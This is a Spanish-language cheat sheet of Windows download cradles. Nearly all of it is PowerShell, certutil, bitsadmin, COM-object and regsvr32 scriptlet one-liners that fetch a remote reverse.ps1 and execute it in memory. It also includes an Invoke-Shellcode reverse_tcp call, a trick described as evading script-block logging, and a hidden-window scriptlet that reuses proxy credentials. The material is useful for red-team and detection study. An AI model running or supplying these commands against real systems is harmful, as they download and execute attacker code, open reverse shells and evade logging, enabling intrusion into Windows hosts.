Saltar a contenido

Cradles for Windows

Los cradles son métodos empleados para facilitar la descarga y ejecución de recursos externos, ya sea para despliegue de herramientas o ejecución de código remoto. Los payloads, por su parte, representan la carga útil que puede incluir acciones específicas dependiendo del objetivo o propósito.

Normal Download

IEX (New-Object Net.Webclient).downloadstring("http://localhost:8080/reverse.ps1")

Invoke-WebRequest Cradle

IEX (iwr 'http://localhost:8080/reverse.ps1')

Msxm12.XMLHTTP COM Object

$req = New-Object -ComObject Msxml2.XMLHTTP;$req.open('GET', 'http://localhost:8080/reverse.ps1', $false);$req.send();iex $req.responseText

WinHttp COM Object

$req = New-Object -ComObject WinHttp.WinHttpRequest.5.1;$req.open('GET', 'http://localhost:8080/reverse.ps1', $false);$req.send();iex $req.responseText

BitsTransfer Cradle

ipmo BitsTransfer;Start-BitsTransfer 'http://localhost:8080/reverse.ps1' $env:temp\rev.ps1;$r = gc $env:temp\rev.ps1;rm $env:temp\rev.ps1;iex $r

Remote XML Execution Cradle

<?xml version="1.0"?>
<command>
   <a>
      <execute>Write-Output "This is a malicious payload"</execute>
   </a>
</command>

$doc = New-Object System.Xml.XmlDocument;$doc.Load("http://localhost:8080/reverse.xml");$doc.command.a.execute | iex

CertUtil Cradle

certutil.exe -urlcache -split -f "http://localhost:8080/reverse.ps1" reverse.ps1; IEX (Get-Content reverse.ps1)

PowerShell Download Encoded Command

$payload = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX (iwr 'http://localhost:8080/reverse.ps1')"))
powershell.exe -EncodedCommand $payload

BitsAdmin Cradle

bitsadmin /transfer "payload" "http://localhost:8080/reverse.ps1" "$env:TEMP\reverse.ps1"; if (Test-Path "$env:TEMP\reverse.ps1") {powershell -ExecutionPolicy Bypass -File "$env:TEMP\reverse.ps1"}

Invoke-Shellcode Cradle

IEX (New-Object Net.Webclient).downloadstring("http://localhost:8080/invoke-shellcode.ps1")
Invoke-Shellcode -Payload "reverse_tcp" -Lhost "127.0.0.1" -Lport 4444

PowerShell ScriptBlock Logging Evasion

$sb = [scriptblock]::Create('IEX (New-Object Net.Webclient).downloadstring("http://localhost:8080/reverse.ps1")'); & $sb

.NET WebClient Gz Cradle

$wc = New-Object System.Net.WebClient
$compressedData = $wc.DownloadData("http://localhost:8080/reverse.ps1.gz")
$memoryStream = New-Object System.IO.MemoryStream(, $compressedData)
$gzStream = New-Object System.IO.Compression.GzipStream($memoryStream, [System.IO.Compression.CompressionMode]::Decompress)
$streamReader = New-Object System.IO.StreamReader($gzStream)
$decompressedScript = $streamReader.ReadToEnd()
Invoke-Expression $decompressedScript

regsvr32 Cradle

<?XML version="1.0"?>
  <scriptlet>
    <registration
      progid="SCT Payload"
      classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
      <script language="JScript">
        <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $u.downloadstring('http://localhost:8080/reverse.ps1');"); ]]>
     </script>
   </registration>
  </scriptlet>

regsvr32 /s /n /u /i:http://localhost:8080/reverse.sct scrobj.dll